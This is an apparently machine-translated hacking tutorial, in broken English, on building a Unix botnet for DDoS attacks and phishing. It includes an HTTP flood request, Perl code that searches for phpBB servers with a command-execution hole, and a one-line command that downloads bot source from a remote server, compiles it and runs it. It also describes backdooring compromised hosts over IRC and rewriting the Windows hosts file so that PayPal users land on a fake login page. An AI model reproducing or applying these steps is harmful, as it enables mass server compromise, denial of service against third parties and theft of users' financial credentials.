Create your own botnet

Security systems are constantly improving, programmers will melt more skilled. Now it is supposed ever less widely known errors.

[Prologue]
The Internet grows with great force. It becomes more difficult for hacker to search for vulnerabilities. Administrators use for working developments of best security experts. See your thoughts? Actually on the Internet a lot of bags, but usually it�s useless. Here, imagine a situation, you were got by any network mongrel, you wish him to be punished. Today we will talk about creation own botnet.

So that is the bot. Uninitiated person images stupid enemies in computer games which you shoot down for two minutes. Yes, it�s partly so. In our case "bot" is a program which executes included in it commands. Seems nothing especial. Someone will object: "I supposedly in five years have written such thing, press a button and the program, olja-lja, is closed" - forget the childhood. All of us know that possibilities of coding are boundless, and you can use it for good and harm. Of course we always use our workings out with good intentions. Botnet is a set of bots connected in the centre which synchronously execute commands of the owner. Bots, by the way, basically are aimed more on Windows cars. Here you can stea; passwords, make socks, format hard disk. I will depart from rules and I will tell how to create botnets from nix systems. Basic function of our boat - is DDOS attacks. It�s the best way to use big channels of nix servers. Let�s count. Server you need to make down uses 100Mb channel. So 10-20 bots standing on the same channel will fill up a server in a moment.


[Writing a bot]
You will find listing of example of bot in the link at the end of article. So let�s see the code. You can control your botnet by IRC or web. The control through IRC has been chosen fir its interactivity. For example I want to root by local kernel sploits a couple of servers in botnet. I just simply execute command SH uname � and by bot I�ll find the computer I need in a moment. Then also having executed a command in IRC the client, I will load backdoor and I�ll receive an interactive shell for the further actions. Possibilities are boundless. You�ll say � it�s possible and through WEB, but what for to reboot a page and to spend the traffic? More convenient to observe all in real time (if there arre 1000 bots or more, it is possible will take care of convenience of the interface - a comment of sensible mind). A lot of people think that organization of DDOS-attack is very difficult. Here an example of code of usual attack:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n

So we simply send inquiry to a server forcing it�s answer. And we send it till the server will be down from shortage of the traffic or processor time. But you can�t use only nix bots, it is necessary to create and windows-botnet, for example, with AgoBot. For this purpose it will be possible to create a certain code for a bot which to scan on a subject lsasl/dcom vulnerability systems which connect to a server which the bot is established on.


[Creating botnet]
Actually to create botnet is very easy. For this purpose we need to find vulnerability in any web script. Founded vulnerability must allow to execute commands shell-interpretation . When you will find vulnerability, pay attention to the name of a file with bug, its header and the name of vulnerable system. Now, by this data, we need to make good search inquiry. For example, take all known vulnerability in phpBB <=2.0.10. The file�s name - viewtopic.php, a variable showing on meaning of forum�s topic - t. So the search inquiry will be like "Powered by phpBB AND viewtopic.php? t =". More reasonably and easier you will make inquiry - more vulnerable servers will fall into your trap. Each search server has unique language of inquiries, so esteem its description before making inquiry. Now it is necessary to automate all it. On Perl we�ll make such sending of inquiry:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next;
print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);

Further, we do filtration of results and run exploit. Exploit must execute a command of start of our bot.

wget http://_server.org/bot.c; gcc bot.c-o bash; chmod +x bash;./bash;

Here we can see too problems. Wget and gcc can not appear or their using can be forbidden. Here downloaders fetch, curl and get will help us. Or console browser lynx or ftp protocol. But it�s realization is more difficult � but plus is tha ftp is everythere. As to compillator you can just make binary on your shell and hope that all will be ok ). Or rewrite bot on interpretated languages � Perl or PHP.

Phishing
It�s very convenient to use bot for phishing organization. We need special optimized pages (which is copying an original site we need), good hosting, or dedicated server or VDS. You can find such pages in the internet or buy or make it by yourself. Mainly it�s copies such sites as paypal.com, moneybookers.com or smth like thos connected with money. Further windows-bot copies a file \system32\drivers\etc\hosts adding to ip IP address of your server and connected it with needed domain name for eample paypal.com. And when user types in his browser paypal.com he see your page on your server � he types login and password there and then it logged in place you need. But if user uses proxy server it won�t work.